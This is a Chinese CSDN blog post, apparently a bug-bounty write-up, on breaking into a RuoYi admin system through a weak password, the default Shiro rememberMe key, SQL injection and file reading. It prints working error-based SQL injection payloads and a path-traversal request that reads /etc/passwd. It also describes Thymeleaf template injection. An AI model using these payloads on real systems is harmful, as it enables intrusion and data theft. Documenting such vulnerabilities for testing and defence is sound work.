漏洞挖掘 | ruoyi框架管理系统漏洞

最新推荐文章于 2024-07-11 23:13:51 发布
最新推荐文章于 2024-07-11 23:13:51 发布
阅读量3.7k 收藏 14
点赞数 7
文章标签: 前端 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80127209/article/details/137223568
版权
本文详细描述了在挖掘若依管理系统时发现的多个安全漏洞,包括弱口令、利用Shiro框架的反序列化漏洞、多处SQL注入点以及文件读取漏洞。作者强调合法使用这些信息进行技术讨论,非用于违法途径。
摘要由CSDN通过智能技术生成

 

前言:

在挖src的时候,可以通过信息收集收集弱口令,然后通过后台弱口令进入后台:

图片


发现一个弱口令进去后:

图片


【魔方老师提醒才发现,这个蓝色的草丛其实可以大致判断是若依系统】
 

图片


看这界面,是不是很像ruoyi
插件一看:

图片


前端vue.js

加上登录的cookie rememberMe:

图片


【登录失败时bp抓包相应包有remeberMe=delete】
得知登录为shiro框架
八九不离十后台就是ruoyi框架的管理系统了

若依管理系统简介

若依管理系统(Ruoyi Admin System)是一款基于Java开发的开源后台管理系统,若依管理系统采用前后端分离架构,前端使用Vue.js框架,后端使用Spring Boot框架。
找了个ruoyi系统的例图如下:

图片

漏洞一:若依前台默认shiro key命令执行漏洞

漏洞简介
若依默认使用shiro组件,所以可以试试shiro经典的反序列化 rememberMe漏洞来getshell。
直接工具一搜哈:
 

图片


直接先爆破密钥,成功了血赚,失败了不亏,还有其他方法能得到AES的key
工具二搜哈:
【url和cookie配置好就直接搜哈】

图片


这里发现了很多的漏洞:

 

[+] 存在Snakeyaml命令执行漏洞[+] 存在JdbcTemplate漏洞[+] 存在ReadFile(新)文件读取漏洞[+] 存在ReadFile(老)文件读取漏洞[+] 存在Thymeleaf模板注入漏洞[+] 存在SQL(1)注入漏洞[+] 存在SQL(2)注入漏洞[+] 存在SQL(3)注入漏洞[+] 存在Shiro框架[+] 存在默认key:xxxxx
 

我们先针对shiro框架:
 拿着key去工具一:
 

图片
 


 然后检测利用链,检测成功后就可以命令执行getshell了:
 

图片
 

图片
 

漏洞二:若依后台存在多处sql注入漏洞
 

第一处:
 

图片
 


 角色管理的搜索,bp拦截抓包:
 

图片
 

 

 

poc:pageSize=&pageNum=&orderByColumn=&isAsc=&roleName=&roleKey=&status=&params[beginTime]=&params[endTime]=&params[dataScope]=and extractvalue(1,concat(0x7e,(select database()),0x7e))
 

报错注入回显database():
 

图片
 

 

 

poc2:pageSize=&pageNum=&orderByColumn=&isAsc=&roleName=&roleKey=&status=¶ms[beginTime]=¶ms[endTime]=¶ms[dataScope]=and extractvalue(1,concat(0x7e,(select table_schema from information_schema.tables limit 0,1),0x7e))
 

图片
 


 爆到库名点到为止
 

第二处:
 

图片
 


 也是角色管理,在导出这里
 

 

 

poc:params[dataScope]=and extractvalue(1,concat(0x7e,(select database()),0x7e))
 

图片
 

图片
 

图片
 

或者直接使用工具二
 

图片
 

图片
 

漏洞三:若依后台任意文件读取(CNVD-2021-01931)
 

直接get访问:
 

 

 

/common/download/resource?resource=/profile/../../../../etc/passwd/common/download/resource?resource=/profile/../../../../Windows/win.ini
 

图片
 

 

漏洞四:Thymeleaf模板注入漏洞
 

用工具二 ping+dnslog验证:
 

图片
 

图片
 

 申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。
 

免费领取安全学习资料包!
 


 渗透工具
 

技术文档、书籍
 

 

面试题
 

 

帮助你在面试中脱颖而出
 

 

视频
 

基础到进阶
 

环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等
 

 

应急响应笔记
 

 

学习路线
 


                

        

        

    




    

      

        

            

              
                
                  运维Z叔
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                    7
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    14
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                  1
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      










                



	

		

			

				
					
若依框架漏洞(若依管理框架漏洞复现)

				
			

			

				

					计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
				

				

					03-28
					
					4349
					
				

			

		

		

			
				
若依框架是一个 Java EE 企业级快速开发平台,基于经典技术组合(Spring Boot、Apache Shiro、MyBatis、Thymeleaf、Bootstrap),内置模块如:部门管理、角色用户、菜单及按钮授权、数据权限、系统参数、日志管理、通知公告等。在线定时任务配置;支持集群,支持多数据源,支持分布式事务。若依框架漏洞默认口令漏洞早期若依框架漏洞版本有反序列化漏洞 ,执行任意命令,漏洞复现,祭出fofa大法,fofa语法如下

			
		

	



                

              
                



	

		

			

				
					
若依系统前后台漏洞大全

					
热门推荐

				
			

			

				

					FY10033的博客
				

				

					08-07
					
					4万+
					
				

			

		

		

			
				
漏洞影响范围RuoYi

			
		

	



                


  
              

                


	

		

			

				
					
ruoyi漏洞poc汇总及其原理分析(源码分析)

				
			

			

				

					问彡心的博客
				

				

					05-25
					
					2883
					
				

			

		

		

			
				
汇总网上常见的若依漏洞poc,根据不同版本的参照对比,分析每个漏洞在不同版本中的代码表现形式,学习这些漏洞后台的代码是如何编写的以及如何进行修复的

			
		

	





	

		

			

				
					
漏洞复现-Ruoyi若依系列

				
			

			

				

					aming小老弟
				

				

					05-02
					
					2万+
					
				

			

		

		

			
				
官方漏洞历史文档。

			
		

	



		

			
		



	

		

			

				
					
若依漏洞综合利用工具

				
			

			

				

					Javachichi的博客
				

				

					11-15
					
					2606
					
				

			

		

		

			
				
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。(都打包成一块的了,不能一一展开,总共300多集)

			
		

	





	

		

			

				
					
若依框架使用的log4j2.16.0,修复log4j漏洞log4j2下载最新log4j2.16.0下载

				
			

			

				

					12-16
				

			

		

		

			
				
若依框架使用的log4j2.16.0,修复log4j漏洞log4j2下载最新log4j2.16.0下载

			
		

	





	

		

			

				
					
若依漏洞利用方式总结

				
			

			

				

					RisunJan的博客
				

				

					01-14
					
					3715
					
				

			

		

		

			
				
声明:此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!

			
		

	





	

		

			

				
					
RuoYi 逻辑缺陷漏洞分析

				
			

			

				

					afeng12345678的博客
				

				

					07-31
					
					2315
					
				

			

		

		

			
				
若依逻辑缺陷漏洞分享。漏洞为本人原创,转载请注明出处。

			
		

	





	

		

			

				
					
代码审计之若依系统

				
			

			

				

					qq_50854662的博客
				

				

					04-10
					
					3373
					
				

			

		

		

			
				
代码审计之若依系统

			
		

	





	

		

			

				
					
渗透测试--实战若依ruoyi框架

				
			

			

				

					qq_53003652的博客
				

				

					11-16
					
					4687
					
				

			

		

		

			
				
最近在挖某src的时候,碰到了一套若依,本以为啥都没有,结果随手一测若依存在的历史漏洞基本都有。是通过很奇怪的信息收集方式找到这个站的,分享出来让大家看看。老司机一看就明白了我在找什么,虽然说机会不大,但偏偏就让我遇到了。

			
		

	





	

		

			

				
					
基于RuoYi的Java档案管理系统设计源码

				
			

			

				

					03-29
				

			

		

		

			
				
这是一个基于RuoYi的Java档案管理系统设计,使用Java、Vue、JavaScript、HTML和Shell语言开发,包含812个文件。主要文件类型包括367个Java源文件、116个Vue文件、101个JavaScript文件、87个SVG文件、72个XML文件、13...

			
		

	





	

		

			

				
					
RuoYi-plus后台管理系统源代码

				
			

			

				

					03-18
				

			

		

		

			
				
RuoYi-plus是一个基于RuoYi升级的springcloud版本管理系统。软件由SMP多商户后台管理系统+API后端接口组成,项目支持cms内容管理和商城业务,提供单机版服务、微服务体系双向选择,微服务集成分布式事务解决方案...

			
		

	





	

		

			

				
					
基于SpringBoot的RuoYi权限管理系统设计源码

				
			

			

				

					04-14
				

			

		

		

			
				
本项目是基于SpringBoot的RuoYi权限管理系统设计源码,共有673个文件,包括271个Java文件、144个HTML文件等。系统采用Spring、MyBatis、Shiro等核心技术,没有其他重度依赖,直接运行即可使用。系统设计注重易读性和...

			
		

	





	

		

			

				
					
RuoYi-plus后台管理系统-其他

				
			

			

				

					06-12
				

			

		

		

			
				
软件由SMP多商户后台管理系统+API后端接口组成,项目支持cms内容管理和商城业务,提供单机版服务、微服务体系双向选择,微服务集成分布式事务解决方案seata,框架基于SpringBoot2.x,springcloudG版本。RuoYi-plus...

			
		

	





	

		

			

				
					
RuoYi-fast_java_RuoYi后台管理系统_

				
			

			

				

					09-30
				

			

		

		

			
				
RuoYi-fast:基于SpringBoot的高效后台管理系统RuoYi-fast是一款以Java语言开发的高效后台管理系统,特别适用于企业级应用。它采用SpringBoot框架,结合现代化的技术栈,为开发者提供了便捷的权限管理和高效的...

			
		

	





	

		

			

				
					
漏洞复现】若依系统后台任意文件读取漏洞

				
			

			

				

					晚风不及你
				

				

					02-27
					
					1070
					
				

			

		

		

			
				
若依系统(RuoYi)是一套基于SpringBoot的权限管理系统,核心技术采用Spring、MyBatis、Shiro,众多政府、企业采用它作为某些系统的权限管理后台,使用率较高。

			
		

	





	

		

			

				
					
记一次若依框架和Springboot常见报错的实战漏洞挖掘

					
最新发布

				
			

			

				

					weixin_72543266的博客
				

				

					07-11
					
					861
					
				

			

		

		

			
				
又是摸鱼的一天,闲的没事,找个站玩玩,首先开局一个框,漏洞全靠扫,哦不对,全靠找.免责声明博文中涉及的方法可能带有危害性,仅供安全研究与教学之用,读者将其方法用作做其他用途,由读者承担全部法律及连带责任,文章作者不负任何责任.本次主要是对渗透测试中的一次实战进行记录,当然也是摸摸鱼的成果,主要是对若依常见的一些利用姿势和springboot的利用姿势做个总结

			
		

	





	

		

			

				
					
漏洞复现】若依系统默认弱口令漏洞

				
			

			

				

					晚风不及你
				

				

					02-26
					
					975
					
				

			

		

		

			
				
若依系统(RuoYi)是一套基于SpringBoot的权限管理系统,核心技术采用Spring、MyBatis、Shiro,众多政府、企业采用它作为某些系统的权限管理后台,使用率较高。

			
		

	





	

		

			

				
					
RuoYi 后台管理系统教程

				
			

			

				

					08-30
				

			

		

		

			
				
RuoYi后台管理系统是一种基于SpringBoot的权限管理系统,可以用于搭建多商户后台管理系统以及实现内容管理和商城业务。
关于RuoYi后台管理系统的教程,可以参考官方文档和在线教程资源。官方文档提供了详细的使用说明和配置指南,可以帮助用户了解系统的功能和使用方法。此外,还有许多在线教程资源,例如博客文章、视频教程和社区讨论,可以帮助用户更深入地学习和使用RuoYi后台管理系统。用户可以根据自己的需求和学习方式选择合适的教程资源来学习RuoYi后台管理系统。<span class="em">1</span><span class="em">2</span>
#### 引用[.reference_title]
-  *1* [RuoYi-fast_java_RuoYi后台管理系统_](https://download.csdn.net/download/weixin_42683392/26271646)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"]
-  *2* [RuoYi-plus后台管理系统-其他](https://download.csdn.net/download/weixin_38562725/19582380)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"]
[ .reference_list ]

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		
评论 1

	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值